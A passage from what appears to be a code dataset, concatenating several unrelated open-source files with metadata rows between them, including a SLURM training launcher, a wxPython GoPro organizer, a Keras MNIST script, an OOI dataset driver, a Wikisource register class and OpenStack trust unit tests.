seq = []
for i in range(100):
for x in range(100 - abs(i - int(pond))):
seq.append(i)
return Fraction(choice(seq))
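# Usage sketch (illustrative; assumes the scripting layer exposes both
# signatures under the name "ent_alea"):
#     jet = ent_alea(20)              # uniform integer between 1 and 20
#     degats = ent_alea(20, talent)   # draw biased toward the value of `talent`
# Note: as written, ent_alea_pond samples from range(100) and never reads its
# `max` argument; the weighting simply favours values close to `pond`.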
| bsd-3-clause | -5,764,540,807,305,007,000 | 39.212121 | 79 | 0.717408 | false |
vladfi1/phillip | launch_many.py | 1 | 3579 | #!/usr/bin/env python
import os
import sys
from argparse import ArgumentParser
import subprocess
from phillip import util
import json
from launch_lib import add_options, launch
parser = ArgumentParser()
parser.add_argument('path', type=str, help="path to enemies file")
add_options(parser)
args = parser.parse_args()
run_trainer_b = True
run_agents_b = True
if args.disk or args.play:
run_trainer_b = False
if args.dry_run:
print("NOT starting jobs:")
else:
print("Starting jobs:")
if not os.path.exists("slurm_logs"):
os.makedirs("slurm_logs")
if not os.path.exists("slurm_scripts"):
os.makedirs("slurm_scripts")
pids = []
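# The enemies file is expected to contain a JSON list of agent directory
# names, e.g. (hypothetical contents): ["FalconBF", "FoxShineBF"]; each name
# is resolved below relative to the local "agents/" directory.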
with open(args.path) as f:
agent_paths = json.load(f)
agent_paths = ['agents/' + e for e in agent_paths]
def get_agents(path):
params = util.load_params(path)
pop_size = params.get('pop_size')
if pop_size and args.pop_size:
pop_size = min(pop_size, args.pop_size)
if pop_size:
pop_ids = range(pop_size)
else:
pop_ids = [-1]
return [(path, params, pop_id) for pop_id in pop_ids]
agents = []
for agent_list in map(get_agents, agent_paths):
agents.extend(agent_list)
trainer_ids = []
def run_trainer(path, params, pop_id):
name = "trainer_" + params['name']
command = "python3 -u phillip/train.py --load " + path
command += " --dump " + ("lo" if args.local else "ib0")
command += " --send %d" % args.send
if args.init:
command += " --init"
if pop_id >= 0:
name += "_%d" % pop_id
command += " --pop_id %d" % pop_id
if args.pop_size:
command += " --pop_size %d" % min(args.pop_size, params['pop_size'])
trainer_id = launch(
args, name, command,
gpu=not args.cpu,
qos='tenenbaum' if args.tenenbaum else None,
mem=16,
pids=pids,
)
if trainer_id:
trainer_ids.append(trainer_id)
trainer_depends = None
if run_trainer_b:
for agent_args in agents:
run_trainer(*agent_args)
if trainer_ids:
trainer_depends = ":".join(trainer_ids)
enemy_commands = []
for enemy_path, _, enemy_id in agents:
enemy_command = " --enemy %s" % enemy_path
if enemy_id >= 0:
enemy_command += " --enemy_id %d" % enemy_id
enemy_commands.append(enemy_command)
def run_agents(path, params, pop_id):
actors = args.agents or params.get('agents', 1)
print("Using %d actors" % actors)
actors_per_enemy = actors // len(agents)
common_command = "python3 -u phillip/run.py --load " + path
if args.disk:
common_command += " --disk 1"
else:
common_command += " --dump 1"
if run_trainer_b:
if args.local:
common_command += " --trainer_ip 127.0.0.1"
if args.local:
common_command += " --dual_core 0"
common_command += " --dolphin --exe dolphin-emu-headless"
common_command += " --zmq 1 --pipe_count 1"
common_command += " --random_swap"
# common_command += " --help"
common_command += " --enemy_dump 1 --enemy_reload 1"
base_name = "actor_" + params['name']
if pop_id >= 0:
base_name += "_%d" % pop_id
common_command += " --pop_id %d" % pop_id
for i, enemy_command in enumerate(enemy_commands):
name = base_name + "_%d" % i
full_command = common_command + enemy_command
launch(
args, name, full_command,
log=args.log_agents,
qos='use-everything' if args.use_everything else None,
array=actors_per_enemy,
depends=trainer_depends,
pids=pids,
)
if run_agents_b:
for agent_args in agents:
run_agents(*agent_args)
if args.local:
with open(args.path + '/pids', 'w') as f:
for p in pids:
f.write(str(p) + ' ')
| gpl-3.0 | 3,765,404,798,221,629,400 | 22.546053 | 74 | 0.628667 | false |
angusmacdonald/gopro-organizer | organizerui/view.py | 1 | 7376 | import wx
from os.path import expanduser
import logging
import threading
from configobj import ConfigObj
config = ConfigObj("default.conf", unrepr=True)
lock = threading.Lock()
class OrganizerView(wx.Frame):
def __init__(self, parent, title):
super(OrganizerView, self).__init__(parent, title=title,
size=(400, 530))
self.InitUI()
self.Centre()
self.Show()
def InitUI(self):
panel = wx.Panel(self)
# Menu
menubar = wx.MenuBar()
fileMenu = wx.Menu()
fitem = fileMenu.Append(wx.ID_EXIT, 'Quit', 'Quit application')
        menubar.Append(fileMenu, '&File')  # attach the menu; without this the Quit item never appears
        self.SetMenuBar(menubar)
self.Bind(wx.EVT_MENU, self.OnClose, fitem)
# Main Body
font = wx.Font(12, wx.SWISS, wx.NORMAL, wx.NORMAL)
fontItalic = wx.Font(12, wx.SWISS, wx.NORMAL, wx.NORMAL)
fontItalic = fontItalic.MakeItalic()
self.fontHeading = wx.Font(12, wx.SWISS, wx.NORMAL, wx.NORMAL)
self.fontHeading.SetPointSize(18)
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add((10,10))
# Heading 1
heading1 = self.createHeading(panel, 'Media Location')
vbox.Add(heading1, flag=wx.EXPAND|wx.LEFT|wx.RIGHT, border=10)
# Input
self.inputPathLabel = wx.StaticText(panel, label='Input Directory ')
self.inputPathLabel.SetToolTip(
wx.ToolTip('All GoPro photos in this directory and all sub-directories will be copied.'))
self.inputPathLabel.SetFont(font)
self.inputPathText = wx.TextCtrl(panel)
self.inputPathText.SetValue(expanduser("~"))
btnInputDir = wx.Button(panel, label='...', size=(40, 20))
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
hbox1.Add(self.inputPathLabel, flag=wx.RIGHT, border=8)
hbox1.Add(self.inputPathText, proportion=1, border=8)
hbox1.Add(btnInputDir, flag=wx.LEFT|wx.RIGHT, border=10)
vbox.Add(hbox1, flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=10)
# Output
self.outputPath = wx.StaticText(panel, label='Output Directory')
self.outputPath.SetFont(font)
self.outputPath.SetToolTip(
wx.ToolTip('Where all GoPro photos will be moved/copied.'))
self.outputPathText = wx.TextCtrl(panel)
self.outputPathText.SetValue(expanduser("~"))
btnOutputDir = wx.Button(panel, label='...', size=(40, 20))
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
hbox2.Add(self.outputPath, flag=wx.RIGHT, border=8)
hbox2.Add(self.outputPathText, proportion=1, flag=wx.RIGHT)
hbox2.Add(btnOutputDir,flag=wx.LEFT|wx.RIGHT, border=10)
vbox.Add(hbox2, flag=wx.LEFT | wx.TOP | wx.RIGHT | wx.EXPAND, border=10)
# Start button
hbox5 = wx.BoxSizer(wx.HORIZONTAL)
self.btnStartOrganizing = wx.Button(panel, label='Start Organizing', size=(400, 30))
hbox5.Add(self.btnStartOrganizing)
vbox.Add(hbox5, flag=wx.EXPAND | wx.RIGHT | wx.LEFT, border=10)
# Options
vbox.Add(self.createHeading(panel, 'Settings'),
flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=5)
# Include THM and LRV files
hbox4 = wx.BoxSizer(wx.HORIZONTAL)
self.chkIncludeThmLrv = wx.CheckBox(panel, label='Include THM and LRV Files.')
self.chkIncludeThmLrv.SetFont(font)
self.chkIncludeThmLrv.SetValue(True)
hbox4.Add(self.chkIncludeThmLrv)
vbox.Add(hbox4, flag=wx.LEFT, border=10)
# Copy or move?
hbox45 = wx.BoxSizer(wx.HORIZONTAL)
self.chkCopyFiles = wx.CheckBox(panel,
label='Copy files (move files if unchecked).')
self.chkCopyFiles.SetFont(font)
self.chkCopyFiles.SetValue(True)
hbox45.Add(self.chkCopyFiles)
vbox.Add(hbox45, flag=wx.LEFT, border=10)
# Store in date sub-directory option:
hbox46 = wx.BoxSizer(wx.HORIZONTAL)
self.chkDateSubDirs = wx.CheckBox(panel,
label='Store items in sub-directories named by date taken.')
self.chkDateSubDirs.SetFont(font)
self.chkDateSubDirs.SetValue(True)
hbox46.Add(self.chkDateSubDirs)
vbox.Add(hbox46, flag=wx.LEFT, border=10)
# Rename files option:
hbox47 = wx.BoxSizer(wx.HORIZONTAL)
self.chkChangeFileNameFormat = wx.CheckBox(panel,
label='Rename files to the following date format:')
self.chkChangeFileNameFormat.SetToolTip(
wx.ToolTip('The format of this pattern is described in the supplied documentation.'))
self.chkChangeFileNameFormat.SetFont(font)
self.chkChangeFileNameFormat.SetValue(False)
hbox47.Add(self.chkChangeFileNameFormat)
vbox.Add(hbox47, flag=wx.LEFT, border=10)
# Date regex for file naming:
hbox48 = wx.BoxSizer(wx.HORIZONTAL)
self.fileNameFormat = wx.TextCtrl(panel)
self.fileNameFormat.Enable(False)
self.fileNameFormat.SetValue(config['date_naming_format'])
hbox48.Add(self.fileNameFormat, proportion=1, border=8)
vbox.Add(hbox48, flag=wx.LEFT|wx.RIGHT|wx.EXPAND, border=30)
# Status Box
vbox.Add(self.createHeading(panel, 'Status'),
flag=wx.EXPAND|wx.LEFT|wx.RIGHT|wx.TOP, border=10)
hbox6 = wx.BoxSizer(wx.HORIZONTAL)
self.statusUpdates = wx.TextCtrl(panel, -1,"Waiting for input...\n",
size=(400, 200), style=wx.TE_MULTILINE | wx.TE_READONLY)
hbox6.Add(self.statusUpdates)
vbox.Add(hbox6, flag=wx.ALIGN_RIGHT|wx.RIGHT|wx.LEFT|wx.EXPAND, border=10)
panel.SetSizer(vbox)
self.chkCopyFiles.Bind(wx.EVT_CHECKBOX, self.OnChkCopyFile)
self.chkChangeFileNameFormat.Bind(wx.EVT_CHECKBOX, self.OnChkFileNameFormat)
btnInputDir.Bind(wx.EVT_BUTTON, self.OnInputPathDir)
btnOutputDir.Bind(wx.EVT_BUTTON, self.OnOutputPathDir)
def createHeading(self, panel, headingText):
hbox = wx.BoxSizer(wx.HORIZONTAL)
pathHeading = wx.StaticText(panel, label=headingText)
pathHeading.SetFont(self.fontHeading)
hbox.Add(pathHeading, flag=wx.RIGHT|wx.EXPAND, border=0)
return hbox
def createExplainerLine(self, panel, font, label_text):
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.inputDescriptionLabel = wx.StaticText(panel, label=label_text)
self.inputDescriptionLabel.SetFont(font)
hbox.Add(self.inputDescriptionLabel, flag=wx.RIGHT|wx.EXPAND, border=8)
return hbox
def OnChkCopyFile(self, event):
if not event.IsChecked():
dial = wx.MessageDialog(None,
'Are you sure? Disabling copy means that files are removed from their source location.', 'Disable copy?',
wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION)
retCode = dial.ShowModal()
if (retCode != wx.ID_YES):
self.chkCopyFiles.SetValue(True)
dial.Destroy()
def OnChkFileNameFormat(self, event):
self.fileNameFormat.Enable(event.IsChecked())
def OnInputPathDir(self, event):
text = "Choose the directory containing your GoPro photos:"
dir = self.chooseDirectory(text)
self.inputPathText.SetValue(dir)
def OnOutputPathDir(self, event):
text = "Choose the directory where the files should be copied:"
dir = self.chooseDirectory(text)
self.outputPathText.SetValue(dir)
def chooseDirectory(self, text):
response = ""
dialog = wx.DirDialog(None, text,style=wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)
if dialog.ShowModal() == wx.ID_OK:
response = dialog.GetPath()
dialog.Destroy()
return response
def AddMessage(self, message):
lock.acquire()
try:
logging.debug("Incoming message: {}".format(message))
newStatus = "{}\n".format(message)
wx.CallAfter(self.statusUpdates.AppendText, newStatus)
finally:
lock.release() # release lock, no matter what
def OnClose(self, event):
self.Close()
if __name__ == '__main__':
appName = "GoPro Organizer"
app = wx.App()
app.SetAppName(appName) # Used in OSx app menu
OrganizerView(None, title=appName)
app.MainLoop() | mit | 2,095,757,634,949,805,800 | 28.626506 | 110 | 0.720445 | false |
luozhaoyu/leetcode | calcu.py | 1 | 1777 | class Symbol(object):
def __init__(self, value, pre=None, succ=None):
self.value = value
self.pre = pre
self.succ = succ
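# Added explanatory note: calculate() tokenises the expression into a doubly
# linked list of Symbol nodes.  Operator nodes are collected into `highs`
# ('*', '/') and `lows` ('+', '-'); every high-precedence node is evaluated
# first and spliced out of the list, then the low-precedence nodes, so the
# final value ends up in head.succ.value.  For example, "3+2*2" reduces to
# 3 -> '+' -> 4 and then to 7.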
class Solution:
# @param {string} s
# @return {integer}
def calculate(self, s):
s = s.replace(" ", "")
head = Symbol(None)
current = head
tmp = ""
highs = []
lows = []
for c in s:
if c.isdigit():
tmp += c
else:
if tmp:
s = Symbol(int(tmp), pre=current)
current.succ = s
current = s
tmp = ""
s = Symbol(c, pre=current)
current.succ = s
current = s
if c == '*' or c == '/':
highs.append(s)
else:
lows.append(s)
if tmp:
s = Symbol(int(tmp), pre=current)
current.succ = s
current = s
for h in highs:
if h.value == '*':
h.pre.value = h.pre.value * h.succ.value
else:
h.pre.value = h.pre.value / h.succ.value
h.pre.succ = h.succ.succ
if h.succ.succ:
h.succ.succ.pre = h.pre
for h in lows:
if h.value == '+':
h.pre.value = h.pre.value + h.succ.value
else:
h.pre.value = h.pre.value - h.succ.value
h.pre.succ = h.succ.succ
if h.succ.succ:
h.succ.succ.pre = h.pre
return head.succ.value
so = Solution()
l = [
"1+1+1",
"1-11",
"3+2*2",
" 3/2 ",
" 3+5 / 2 ",
"1",
"111",
"111 / 2 + 3 * 3",
]
for s in l:
print s, so.calculate(s)
| mit | 751,166,453,840,263,700 | 22.693333 | 56 | 0.396173 | false |
mvpossum/deep-learning | tp2/ej2ai.py | 1 | 1839 | '''Trains a simple deep NN on the MNIST dataset.
Adapted from the standard Keras MNIST MLP example, but trained here on only
25% of the training set, with the first hidden layer narrowed to 10 units and
only 5 epochs, so accuracy will be well below the original example's 98.40%.
'''
from __future__ import print_function
import numpy as np
np.random.seed(1337) # for reproducibility
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.optimizers import SGD, Adam, RMSprop
from keras.utils import np_utils
batch_size = 128
nb_classes = 10
nb_epoch = 5
# the data, shuffled and split between train and test sets
(X_train, y_train), (X_test, y_test) = mnist.load_data()
train_len = int(X_train.shape[0]*.25)
X_train, y_train = X_train[:train_len], y_train[:train_len]
X_train = X_train.reshape(train_len, 784)
X_test = X_test.reshape(10000, 784)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print(X_train.shape[0], 'train samples')
print(X_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
model = Sequential()
model.add(Dense(10, input_shape=(784,)))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense(10))
model.add(Activation('softmax'))
model.summary()
model.compile(loss='categorical_crossentropy',
optimizer=RMSprop(),
metrics=['accuracy'])
history = model.fit(X_train, Y_train,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=1, validation_data=(X_test, Y_test))
score = model.evaluate(X_test, Y_test, verbose=0)
print('Test score:', score[0])
print('Test accuracy:', score[1])
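# Optional follow-up sketch (illustrative): inspect a few predictions.
# preds = model.predict(X_test[:5], verbose=0)
# print('predicted:', preds.argmax(axis=-1), 'actual:', y_test[:5])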
| mit | -2,993,582,487,547,231,700 | 28.190476 | 64 | 0.699293 | false |
oceanobservatories/mi-instrument | mi/dataset/driver/ctdpf_ckl/wfp/ctdpf_ckl_wfp_driver.py | 1 | 2824 | #!/usr/local/bin/python2.7
##
# OOIPLACEHOLDER
#
# Copyright 2020 Raytheon Co.
##
import os
from mi.core.versioning import version
from mi.dataset.dataset_driver import SimpleDatasetDriver, ParticleDataHandler
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.parser.ctdpf_ckl_wfp import CtdpfCklWfpParser, \
METADATA_PARTICLE_CLASS_KEY, \
DATA_PARTICLE_CLASS_KEY
from mi.dataset.parser.wfp_c_file_common import WfpCFileCommonConfigKeys
from mi.dataset.parser.ctdpf_ckl_wfp_particles import \
CtdpfCklWfpTelemeteredDataParticle, \
CtdpfCklWfpTelemeteredMetadataParticle, \
CtdpfCklWfpDataParticleKey
from mi.core.log import get_logger
log = get_logger()
class CtdpfCklWfpDriver(SimpleDatasetDriver):
"""
Derived wc_wm_cspp driver class
All this needs to do is create a concrete _build_parser method
"""
def __init__(self, unused, stream_handle, particle_data_handler, e_file_time_pressure_tuples):
self._e_file_time_pressure_tuples = e_file_time_pressure_tuples
super(CtdpfCklWfpDriver, self).__init__(unused, stream_handle, particle_data_handler)
def _build_parser(self, stream_handle):
parser_config = {
WfpCFileCommonConfigKeys.PRESSURE_FIELD_C_FILE: CtdpfCklWfpDataParticleKey.PRESSURE,
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
METADATA_PARTICLE_CLASS_KEY: CtdpfCklWfpTelemeteredMetadataParticle,
DATA_PARTICLE_CLASS_KEY: CtdpfCklWfpTelemeteredDataParticle
}
}
file_size = os.path.getsize(stream_handle.name)
parser = CtdpfCklWfpParser(parser_config,
stream_handle,
self._exception_callback,
file_size,
self._e_file_time_pressure_tuples)
return parser
@version("0.0.1")
def parse(unused, source_file_path, particle_data_handler):
"""
This is the method called by Uframe
:param unused
:param source_file_path This is the full path and filename of the file to be parsed
:param particle_data_handler Java Object to consume the output of the parser
:return particle_data_handler
"""
# Let this be None until we modify the global E file driver to get these tuples
e_file_time_pressure_tuples = None
# Parse the ctd file and use the e_file_time_pressure_tuples to generate
# the internal timestamps of the particles
with open(source_file_path, 'rb') as stream_handle:
driver = CtdpfCklWfpDriver(
unused, stream_handle, particle_data_handler, e_file_time_pressure_tuples)
driver.processFileStream()
return particle_data_handler
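# Minimal invocation sketch (the file path is hypothetical; in production
# uFrame supplies these arguments):
# if __name__ == '__main__':
#     handler = ParticleDataHandler()
#     parse(None, '/tmp/example_ctdpf_ckl_wfp.dat', handler)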
| bsd-2-clause | -6,805,808,115,779,619,000 | 34.746835 | 98 | 0.686615 | false |
the-it/WS_THEbotIT | service/ws_re/register/register_types/volume.py | 1 | 4464 | import json
from typing import Union, Optional, List
from service.ws_re.register._base import Register, _REGISTER_PATH
from service.ws_re.register._typing import LemmaDict
from service.ws_re.register.authors import Authors
from service.ws_re.register.lemma import Lemma
from service.ws_re.volumes import Volume, Volumes
class VolumeRegister(Register):
_REGISTER_PATH = _REGISTER_PATH
def __init__(self, volume: Volume, authors: Authors):
super().__init__()
self._authors = authors
self._volume = volume
with open(self._REGISTER_PATH.joinpath(f"{volume.file_name}.json"),
"r", encoding="utf-8") as json_file:
lemma_list = json.load(json_file)
for lemma in lemma_list:
self._lemmas.append(Lemma(lemma, self._volume, self._authors))
def __repr__(self):
return f"<{self.__class__.__name__} - volume:{self.volume.name}, lemmas:{len(self.lemmas)}>"
def __len__(self):
return len(self._lemmas)
@property
def volume(self) -> Volume:
return self._volume
@property
def authors(self) -> Authors:
return self._authors
@property
def lemmas(self) -> List[Lemma]:
return self._lemmas
def _get_table(self) -> str:
header = """{|class="wikitable sortable"
!Artikel
!Status
!Wikilinks
!Seite
!Autor
!Sterbejahr"""
table = [header]
for lemma in self._lemmas:
table.append(lemma.get_table_row())
table.append("|}")
return "\n".join(table)
def _get_header(self) -> str:
header = ["RERegister"]
header.append(f"BAND={self.volume.name}")
# calculate pre and post issue
volumes = Volumes()
vg, nf = volumes.get_neighbours(self.volume.name)
header.append(f"VG={vg}")
header.append(f"NF={nf}")
header.append(f"SUM={len(self.lemmas)}")
# calculate proof_read status
fer, kor, unk = self.proof_read
header.append(f"UNK={unk}")
header.append(f"KOR={kor}")
header.append(f"FER={fer}")
return "{{" + "\n|".join(header) + "\n}}\n"
def _get_footer(self) -> str:
return f"[[Kategorie:RE:Register|!]]\nZahl der Artikel: {len(self._lemmas)}, " \
f"davon [[:Kategorie:RE:Band {self._volume.name}" \
f"|{{{{PAGESINCATEGORY:RE:Band {self._volume.name}|pages}}}} in Volltext]]."
def get_register_str(self) -> str:
return f"{self._get_header()}\n{self._get_table()}\n{self._get_footer()}"
def persist(self):
persist_list = []
for lemma in self.lemmas:
persist_list.append(lemma.lemma_dict)
with open(self._REGISTER_PATH.joinpath("{}.json".format(self._volume.file_name)),
"w", encoding="utf-8") as json_file:
json.dump(persist_list, json_file, indent=2, ensure_ascii=False)
def __getitem__(self, idx: int) -> Lemma:
return self.lemmas[idx]
def get_lemma_by_name(self, lemma_name: str, self_supplement: bool = False) -> Optional[Lemma]:
found_before = False
for lemma in self.lemmas:
if lemma["lemma"] == lemma_name:
if found_before or not self_supplement:
return lemma
found_before = True
return None
def get_lemma_by_sort_key(self, sort_key: str, self_supplement: bool = False) -> Optional[Lemma]:
# normalize it
sort_key = Lemma.make_sort_key(sort_key)
found_before = False
for lemma in self.lemmas:
if lemma.sort_key == sort_key:
if found_before or not self_supplement:
return lemma
found_before = True
return None
def get_index_of_lemma(self, lemma_input: Union[str, Lemma], self_supplement: bool = False) -> Optional[int]:
if isinstance(lemma_input, str):
lemma = self.get_lemma_by_name(lemma_input, self_supplement)
else:
lemma = lemma_input
if lemma:
return self.lemmas.index(lemma)
return None
def __contains__(self, lemma_name: str) -> bool:
return bool(self.get_lemma_by_name(lemma_name))
@staticmethod
def normalize_sort_key(lemma_dict: LemmaDict) -> str:
if "sort_key" in lemma_dict:
return Lemma.make_sort_key(lemma_dict["sort_key"])
return Lemma.make_sort_key(lemma_dict["lemma"])
| mit | 3,885,164,164,905,527,300 | 34.149606 | 113 | 0.58983 | false |
openstack/python-openstackclient | openstackclient/tests/unit/identity/v3/test_trust.py | 1 | 8837 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
from unittest import mock
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.identity.v3 import trust
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit.identity.v3 import fakes as identity_fakes
class TestTrust(identity_fakes.TestIdentityv3):
def setUp(self):
super(TestTrust, self).setUp()
self.trusts_mock = self.app.client_manager.identity.trusts
self.trusts_mock.reset_mock()
self.projects_mock = self.app.client_manager.identity.projects
self.projects_mock.reset_mock()
self.users_mock = self.app.client_manager.identity.users
self.users_mock.reset_mock()
self.roles_mock = self.app.client_manager.identity.roles
self.roles_mock.reset_mock()
class TestTrustCreate(TestTrust):
def setUp(self):
super(TestTrustCreate, self).setUp()
self.projects_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.PROJECT),
loaded=True,
)
self.users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
self.roles_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.ROLE),
loaded=True,
)
self.trusts_mock.create.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.TRUST),
loaded=True,
)
# Get the command object to test
self.cmd = trust.CreateTrust(self.app, None)
def test_trust_create_basic(self):
arglist = [
'--project', identity_fakes.project_id,
'--role', identity_fakes.role_id,
identity_fakes.user_id,
identity_fakes.user_id
]
verifylist = [
('project', identity_fakes.project_id),
('impersonate', False),
('role', [identity_fakes.role_id]),
('trustor', identity_fakes.user_id),
('trustee', identity_fakes.user_id),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class ShowOne in cliff, abstract method take_action()
# returns a two-part tuple with a tuple of column names and a tuple of
# data to be shown.
columns, data = self.cmd.take_action(parsed_args)
# Set expected values
kwargs = {
'impersonation': False,
'project': identity_fakes.project_id,
'role_ids': [identity_fakes.role_id],
'expires_at': None,
}
# TrustManager.create(trustee_id, trustor_id, impersonation=,
# project=, role_names=, expires_at=)
self.trusts_mock.create.assert_called_with(
identity_fakes.user_id,
identity_fakes.user_id,
**kwargs
)
collist = ('expires_at', 'id', 'impersonation', 'project_id',
'roles', 'trustee_user_id', 'trustor_user_id')
self.assertEqual(collist, columns)
datalist = (
identity_fakes.trust_expires,
identity_fakes.trust_id,
identity_fakes.trust_impersonation,
identity_fakes.project_id,
identity_fakes.role_name,
identity_fakes.user_id,
identity_fakes.user_id
)
self.assertEqual(datalist, data)
class TestTrustDelete(TestTrust):
def setUp(self):
super(TestTrustDelete, self).setUp()
# This is the return value for utils.find_resource()
self.trusts_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.TRUST),
loaded=True,
)
self.trusts_mock.delete.return_value = None
# Get the command object to test
self.cmd = trust.DeleteTrust(self.app, None)
def test_trust_delete(self):
arglist = [
identity_fakes.trust_id,
]
verifylist = [
('trust', [identity_fakes.trust_id])
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.take_action(parsed_args)
self.trusts_mock.delete.assert_called_with(
identity_fakes.trust_id,
)
self.assertIsNone(result)
@mock.patch.object(utils, 'find_resource')
def test_delete_multi_trusts_with_exception(self, find_mock):
find_mock.side_effect = [self.trusts_mock.get.return_value,
exceptions.CommandError]
arglist = [
identity_fakes.trust_id,
'unexist_trust',
]
verifylist = [
('trust', arglist),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
try:
self.cmd.take_action(parsed_args)
self.fail('CommandError should be raised.')
except exceptions.CommandError as e:
self.assertEqual('1 of 2 trusts failed to delete.',
str(e))
find_mock.assert_any_call(self.trusts_mock, identity_fakes.trust_id)
find_mock.assert_any_call(self.trusts_mock, 'unexist_trust')
self.assertEqual(2, find_mock.call_count)
self.trusts_mock.delete.assert_called_once_with(
identity_fakes.trust_id)
class TestTrustList(TestTrust):
def setUp(self):
super(TestTrustList, self).setUp()
self.trusts_mock.list.return_value = [
fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.TRUST),
loaded=True,
),
]
# Get the command object to test
self.cmd = trust.ListTrust(self.app, None)
def test_trust_list_no_options(self):
arglist = []
verifylist = []
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class Lister in cliff, abstract method take_action()
# returns a tuple containing the column names and an iterable
# containing the data to be listed.
columns, data = self.cmd.take_action(parsed_args)
self.trusts_mock.list.assert_called_with()
collist = ('ID', 'Expires At', 'Impersonation', 'Project ID',
'Trustee User ID', 'Trustor User ID')
self.assertEqual(collist, columns)
datalist = ((
identity_fakes.trust_id,
identity_fakes.trust_expires,
identity_fakes.trust_impersonation,
identity_fakes.project_id,
identity_fakes.user_id,
identity_fakes.user_id
), )
self.assertEqual(datalist, tuple(data))
class TestTrustShow(TestTrust):
def setUp(self):
super(TestTrustShow, self).setUp()
self.trusts_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.TRUST),
loaded=True,
)
# Get the command object to test
self.cmd = trust.ShowTrust(self.app, None)
def test_trust_show(self):
arglist = [
identity_fakes.trust_id,
]
verifylist = [
('trust', identity_fakes.trust_id),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# In base command class ShowOne in cliff, abstract method take_action()
# returns a two-part tuple with a tuple of column names and a tuple of
# data to be shown.
columns, data = self.cmd.take_action(parsed_args)
self.trusts_mock.get.assert_called_with(identity_fakes.trust_id)
collist = ('expires_at', 'id', 'impersonation', 'project_id',
'roles', 'trustee_user_id', 'trustor_user_id')
self.assertEqual(collist, columns)
datalist = (
identity_fakes.trust_expires,
identity_fakes.trust_id,
identity_fakes.trust_impersonation,
identity_fakes.project_id,
identity_fakes.role_name,
identity_fakes.user_id,
identity_fakes.user_id
)
self.assertEqual(datalist, data)
| apache-2.0 | -7,579,739,614,967,105,000 | 32.097378 | 79 | 0.595904 | false |
bluemellophone/ibeis_cnn | broken/old_batch.py | 1 | 5867 | #def create_sliced_iter_funcs_train2(model, X_unshared, y_unshared):
# """
# WIP: NEW IMPLEMENTATION WITH PRELOADING GPU DATA
# build the Theano functions (symbolic expressions) that will be used in the
# optimization refer to this link for info on tensor types:
# References:
# http://deeplearning.net/software/theano/library/tensor/basic.html
# http://deeplearning.net/software/theano/tutorial/aliasing.html#borrowing-when-creating-shared-variables
# http://deeplearning.net/tutorial/lenet.html
# # TODO: Deal with batching to the GPU by setting the value of the shared variables.
# CommandLine:
# python -m ibeis_cnn.batch_processing --test-create_sliced_iter_funcs_train2
# Example:
# >>> # DISABLE_DOCTEST
# >>> from ibeis_cnn.batch_processing import * # NOQA
# >>> from ibeis_cnn import draw_net
# >>> from ibeis_cnn import models
# >>> model = models.DummyModel(autoinit=True)
# >>> X_unshared, y_unshared = model.make_random_testdata()
# >>> train_iter = model.build_theano_funcs(model)
# >>> print(train_iter)
# >>> loss_train, newtork_output, prediction, accuracy = train_iter(0)
# >>> print('loss = %r' % (loss,))
# >>> print('net_out = %r' % (outvec,))
# >>> print('newtork_output = %r' % (newtork_output,))
# >>> print('accuracy = %r' % (accuracy,))
# >>> #draw_net.draw_theano_symbolic_expression(train_iter)
# >>> assert outvec.shape == (model.batch_size, model.output_dims)
# """
# # Attempt to load data on to the GPU
# # Labels to go into the GPU as float32 and then cast to int32 once inside
# X_unshared = np.asarray(X_unshared, dtype=theano.config.floatX)
# y_unshared = np.asarray(y_unshared, dtype=theano.config.floatX)
# X_shared = theano.shared(X_unshared, borrow=True)
# y_shared = T.cast(theano.shared(y_unshared, borrow=True), 'int32')
# # Build expressions which sample a batch
# batch_size = model.batch_size
# # Initialize symbolic input variables
# index = T.lscalar(name='index')
# X_batch = T.tensor4(name='X_batch')
# y_batch = T.ivector(name='y_batch')
# WHITEN = False
# if WHITEN:
# # We might be able to perform some data augmentation here symbolicly
# data_mean = X_unshared.mean()
# data_std = X_unshared.std()
# givens = {
# X_batch: (X_shared[index * batch_size: (index + 1) * batch_size] - data_mean) / data_std,
